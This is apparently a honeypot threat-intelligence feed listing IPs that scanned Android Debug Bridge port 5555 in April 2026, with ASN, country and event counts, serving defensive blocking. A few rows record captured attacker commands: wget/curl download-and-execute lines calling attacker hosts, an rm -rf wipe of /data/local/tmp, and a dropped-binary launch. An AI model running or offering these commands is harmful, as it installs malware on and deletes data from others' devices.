IPv4	78.153.136.4	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=FR; asn=201097; asn_org=KVANTA LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-24T20:12:12.000Z \| last_seen=2026-04-24T20:13:16.151Z \| ports=5555 \| cc=FR \| asn=201097 \| org=KVANTA LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	172.236.35.120	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=AU; asn=63949; asn_org=Akamai Connected Cloud; cats=Misc activity; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-24T21:49:09.000Z \| last_seen=2026-04-24T21:59:17.291Z \| ports=5555 \| cc=AU \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-24
IPv4	73.200.150.131	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-25T00:31:11.000Z \| last_seen=2026-04-25T00:31:11.731Z \| ports=5555 \| cc=US \| asn=7922 \| org=Comcast Cable Communications, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	31.57.129.70	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=AE; asn=210718; asn_org=Five Cyber Host Security S.r.l.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=10 \| first_seen=2026-04-25T01:50:32.000Z \| last_seen=2026-04-25T02:00:40.630Z \| ports=5555 \| cc=AE \| asn=210718 \| org=Five Cyber Host Security S.r.l.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	65.49.1.122	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-25T01:31:10.000Z \| last_seen=2026-04-25T01:41:22.996Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	65.49.1.128	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-25T01:29:44.000Z \| last_seen=2026-04-25T01:30:53.951Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	198.235.24.91	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=23 \| first_seen=2026-04-25T03:34:37.000Z \| last_seen=2026-04-25T03:45:59.980Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	147.185.132.211	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-25T05:57:07.000Z \| last_seen=2026-04-25T06:08:02.986Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	80.89.74.170	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=LV; asn=24921; asn_org=Latvijas Mobilais Telefons SIA; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=13 \| first_seen=2026-04-25T06:39:37.000Z \| last_seen=2026-04-25T06:49:49.119Z \| ports=5555 \| cc=LV \| asn=24921 \| org=Latvijas Mobilais Telefons SIA	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	207.148.2.115	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=US; asn=20473; asn_org=The Constant Company, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=28 \| first_seen=2026-04-25T07:28:46.000Z \| last_seen=2026-04-27T03:42:17.933Z \| ports=5555 \| cc=US \| asn=20473 \| org=The Constant Company, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	185.228.3.14	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=PT; asn=206092; asn_org=F.n.s. Holdings Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-25T08:45:53.000Z \| last_seen=2026-04-25T08:56:02.673Z \| ports=5555 \| cc=PT \| asn=206092 \| org=F.n.s. Holdings Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	88.180.78.246	Attacker IP • ADB / seen in ADBHoney; events=29; ports=5555; cc=FR; asn=12322; asn_org=Free SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=29 \| first_seen=2026-04-25T10:09:50.000Z \| last_seen=2026-04-25T10:20:25.001Z \| ports=5555 \| cc=FR \| asn=12322 \| org=Free SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	65.49.20.67	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-25T13:47:52.000Z \| last_seen=2026-04-25T13:57:58.879Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	65.49.20.99	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-25T13:47:18.000Z \| last_seen=2026-04-25T13:48:28.521Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	45.79.186.176	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-25T15:46:41.000Z \| last_seen=2026-04-25T15:47:42.670Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	117.146.148.187	Attacker IP • ADB / seen in ADBHoney; events=51; ports=5555; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-04. events=57 \| first_seen=2026-04-25T18:57:26.000Z \| last_seen=2026-04-25T19:09:47.412Z \| ports=5555 \| cc=CN \| asn=9808 \| org=China Mobile Communications Group Co., Ltd. \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-25
IPv4	176.65.139.150	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-25T18:47:08.000Z \| last_seen=2026-04-25T18:48:41.267Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	31.56.144.12	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=US; asn=214828; asn_org=StarLight Network, Inc.; adb_cmd_hits=0; cmd="cd /data/local/tmp/; wget http://31.56.144.12/cat.sh -O cat.sh; curl -O http://31.56.144.12/cat.sh; busybox wget http://31.56.144.12/cat.sh -O cat.sh; sh cat.sh" Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-25T18:45:38.000Z \| last_seen=2026-04-25T18:47:32.570Z \| ports=5555 \| cc=US \| asn=214828 \| org=StarLight Network, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	87.121.84.136	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=215925; asn_org=Vpsvault.host Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=35 \| first_seen=2026-04-25T18:42:57.000Z \| last_seen=2026-04-25T22:28:59.694Z \| ports=5555 \| cc=US \| asn=215925 \| org=Vpsvault.host Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	20.64.105.127	Attacker IP • ADB / seen in ADBHoney; events=25; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=25 \| first_seen=2026-04-25T19:34:39.000Z \| last_seen=2026-04-25T19:46:43.998Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	187.191.2.213	Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=MX; asn=22884; asn_org=TOTAL PLAY TELECOMUNICACIONES SA DE CV; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-25T20:55:38.000Z \| last_seen=2026-04-25T21:06:11.862Z \| ports=5555 \| cc=MX \| asn=22884 \| org=TOTAL PLAY TELECOMUNICACIONES SA DE CV	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	183.128.237.118	Attacker IP • ADB / seen in ADBHoney; events=50; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-04. events=50 \| first_seen=2026-04-25T22:05:13.000Z \| last_seen=2026-04-25T22:18:28.538Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet \| related_hashes=76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-25
IPv4	47.87.140.88	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=DE; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=40 \| first_seen=2026-04-25T22:27:52.000Z \| last_seen=2026-04-28T03:41:48.246Z \| ports=5555 \| cc=DE \| asn=45102 \| org=Alibaba US Technology Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-25
IPv4	131.161.123.7	Attacker IP • ADB / seen in ADBHoney; events=33; ports=5555; cc=BR; asn=264377; asn_org=FV TECNOLOGIA DA INFORMACAO LTDA ME; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=33 \| first_seen=2026-04-26T01:15:38.000Z \| last_seen=2026-04-26T01:31:17.703Z \| ports=5555 \| cc=BR \| asn=264377 \| org=FV TECNOLOGIA DA INFORMACAO LTDA ME	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-26
IPv4	167.99.185.126	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-26T02:30:29.000Z \| last_seen=2026-04-26T02:31:39.827Z \| ports=5555 \| cc=CA \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-26
IPv4	165.232.85.99	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=NL; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-26T03:45:27.000Z \| last_seen=2026-04-26T03:55:38.117Z \| ports=5555 \| cc=NL \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-26
IPv4	181.170.228.228	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=AR; asn=7303; asn_org=Telecom Argentina S.A.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=3 \| first_seen=2026-04-26T03:06:42.000Z \| last_seen=2026-04-26T03:07:45.623Z \| ports=5555 \| cc=AR \| asn=7303 \| org=Telecom Argentina S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-26
IPv4	198.235.24.120	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=23 \| first_seen=2026-04-26T06:39:23.000Z \| last_seen=2026-04-26T06:50:56.855Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-26
IPv4	64.62.197.214	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-26T11:06:34.000Z \| last_seen=2026-04-26T11:07:43.691Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-26
IPv4	137.184.218.133	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-26T12:55:40.000Z \| last_seen=2026-04-26T12:56:43.972Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-26
IPv4	165.22.233.200	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-26T15:17:03.000Z \| last_seen=2026-04-26T15:28:22.359Z \| ports=5555 \| cc=CA \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-26
IPv4	45.33.110.79	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-26T15:46:44.000Z \| last_seen=2026-04-26T15:47:46.882Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-26
IPv4	147.182.130.22	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-26T16:40:16.000Z \| last_seen=2026-04-26T16:50:33.724Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-26
IPv4	150.95.26.113	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=JP; asn=135161; asn_org=GMO-Z com NetDesign Holdings Co., Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-26T16:52:38.000Z \| last_seen=2026-04-26T16:54:12.688Z \| ports=5555 \| cc=JP \| asn=135161 \| org=GMO-Z com NetDesign Holdings Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-26
IPv4	213.195.116.104	Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=ES; asn=15704; asn_org=Xtra Telecom S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=12 \| first_seen=2026-04-26T18:07:02.000Z \| last_seen=2026-04-26T18:08:16.078Z \| ports=5555 \| cc=ES \| asn=15704 \| org=Xtra Telecom S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-26
IPv4	176.28.149.99	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=JO; asn=48832; asn_org=Jordanian mobile phone services Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-26T23:06:25.000Z \| last_seen=2026-04-26T23:19:00.993Z \| ports=5555 \| cc=JO \| asn=48832 \| org=Jordanian mobile phone services Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-27
IPv4	112.90.220.243	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=CN; asn=134543; asn_org=China Unicom Guangdong IP network; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-27T02:18:13.000Z \| last_seen=2026-04-27T02:28:23.690Z \| ports=5555 \| cc=CN \| asn=134543 \| org=China Unicom Guangdong IP network	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-27
IPv4	176.65.139.81	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=20 \| first_seen=2026-04-27T02:57:05.000Z \| last_seen=2026-04-30T18:10:51.594Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-27
IPv4	201.253.248.205	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=AR; asn=7303; asn_org=Telecom Argentina S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=22 \| first_seen=2026-04-27T02:15:01.000Z \| last_seen=2026-04-27T02:16:11.211Z \| ports=5555 \| cc=AR \| asn=7303 \| org=Telecom Argentina S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-27
IPv4	85.217.149.65	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CA; asn=209334; asn_org=Modat B.V.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-27T03:02:28.000Z \| last_seen=2026-04-27T03:12:37.343Z \| ports=5555 \| cc=CA \| asn=209334 \| org=Modat B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-27
IPv4	194.164.107.5	Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=US; asn=50219; asn_org=Valence Technology Co.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=26 \| first_seen=2026-04-27T04:06:32.000Z \| last_seen=2026-04-27T04:50:12.768Z \| ports=5555 \| cc=US \| asn=50219 \| org=Valence Technology Co.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-27
IPv4	85.11.167.89	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BG; asn=213438; asn_org=ColocaTel Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=1538 \| first_seen=2026-04-27T04:32:38.000Z \| last_seen=2026-04-30T15:53:02.010Z \| ports=5555 \| cc=BG \| asn=213438 \| org=ColocaTel Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-27
IPv4	205.210.31.108	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=23 \| first_seen=2026-04-27T05:33:19.000Z \| last_seen=2026-04-27T05:44:58.383Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-27
IPv4	129.121.38.216	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=BR; asn=31898; asn_org=Oracle Corporation; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=13 \| first_seen=2026-04-27T09:20:31.000Z \| last_seen=2026-04-27T09:34:54.607Z \| ports=5555 \| cc=BR \| asn=31898 \| org=Oracle Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-27
IPv4	47.84.138.180	Attacker IP • ADB / seen in ADBHoney; events=59; ports=5555; cc=SG; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=59 \| first_seen=2026-04-27T16:16:53.000Z \| last_seen=2026-04-27T16:19:06.801Z \| ports=5555 \| cc=SG \| asn=45102 \| org=Alibaba US Technology Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-27
IPv4	92.63.197.182	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-27T17:21:27.000Z \| last_seen=2026-04-27T17:22:28.043Z \| ports=5555 \| cc=UA \| asn=211736 \| org=FOP Dmytro Nedilskyi	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-27
IPv4	159.147.240.64	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=ES; asn=12430; asn_org=Vodafone Spain; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=24 \| first_seen=2026-04-27T18:55:12.000Z \| last_seen=2026-04-27T19:05:19.290Z \| ports=5555 \| cc=ES \| asn=12430 \| org=Vodafone Spain	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-27
IPv4	170.187.158.194	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-27T20:07:52.000Z \| last_seen=2026-04-27T20:08:57.479Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-27
IPv4	192.81.129.180	Attacker IP • ADB / seen in ADBHoney; events=283; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=283 \| first_seen=2026-04-27T20:18:31.000Z \| last_seen=2026-04-27T20:29:38.616Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-27
IPv4	198.235.24.104	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=23 \| first_seen=2026-04-27T22:46:45.000Z \| last_seen=2026-04-27T22:58:20.976Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-27
IPv4	60.251.69.207	Attacker IP • ADB / seen in ADBHoney; events=32; ports=5555; cc=TW; asn=3462; asn_org=Data Communication Business Group; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp/*" Observed in ADBHoney telemetry for 2026-04. events=32 \| first_seen=2026-04-27T23:33:09.000Z \| last_seen=2026-04-27T23:44:44.966Z \| ports=5555 \| cc=TW \| asn=3462 \| org=Data Communication Business Group \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-28
IPv4	223.123.43.3	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=PK; asn=138423; asn_org=CMPak Limited; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=1 Observed in ADBHoney telemetry for 2026-04. events=11 \| first_seen=2026-04-28T05:13:12.000Z \| last_seen=2026-04-28T05:23:26.751Z \| ports=5555 \| cc=PK \| asn=138423 \| org=CMPak Limited	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-04-28
IPv4	152.32.183.22	Attacker IP • ADB / seen in ADBHoney; events=107; ports=5555; cc=US; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=107 \| first_seen=2026-04-28T07:03:22.000Z \| last_seen=2026-04-28T07:57:37.526Z \| ports=5555 \| cc=US \| asn=135377 \| org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-28
IPv4	159.89.188.55	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-28T07:01:16.000Z \| last_seen=2026-04-28T07:12:08.360Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-28
IPv4	203.217.101.198	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=TW; asn=17809; asn_org=VEE TIME CORP.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-28T12:07:05.000Z \| last_seen=2026-04-28T12:08:44.685Z \| ports=5555 \| cc=TW \| asn=17809 \| org=VEE TIME CORP.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-28
IPv4	65.49.1.181	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-28T13:53:02.000Z \| last_seen=2026-04-28T13:54:10.148Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-28
IPv4	69.164.214.243	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-28T15:47:24.000Z \| last_seen=2026-04-28T15:48:27.285Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-28
IPv4	142.248.80.38	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=US; asn=22295; asn_org=Advin Services LLC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://142.248.80.144/w.sh; sh w.sh; curl http://142.248.80.144/c.sh; sh c.sh" Observed in ADBHoney telemetry for 2026-04. events=13 \| first_seen=2026-04-28T20:03:01.000Z \| last_seen=2026-04-28T20:05:13.663Z \| ports=5555 \| cc=US \| asn=22295 \| org=Advin Services LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-28
IPv4	185.141.119.89	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=US; asn=207990; asn_org=HostRoyale Technologies Pvt Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=36 \| first_seen=2026-04-28T20:53:36.000Z \| last_seen=2026-04-30T05:38:13.316Z \| ports=5555 \| cc=US \| asn=207990 \| org=HostRoyale Technologies Pvt Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-28
IPv4	130.131.162.246	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=27 \| first_seen=2026-04-29T00:58:29.000Z \| last_seen=2026-04-29T01:10:53.868Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	143.244.128.100	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=IN; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-29T01:58:59.000Z \| last_seen=2026-04-29T02:09:14.605Z \| ports=5555 \| cc=IN \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	91.231.89.12	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-29T02:08:51.000Z \| last_seen=2026-04-29T02:19:06.780Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
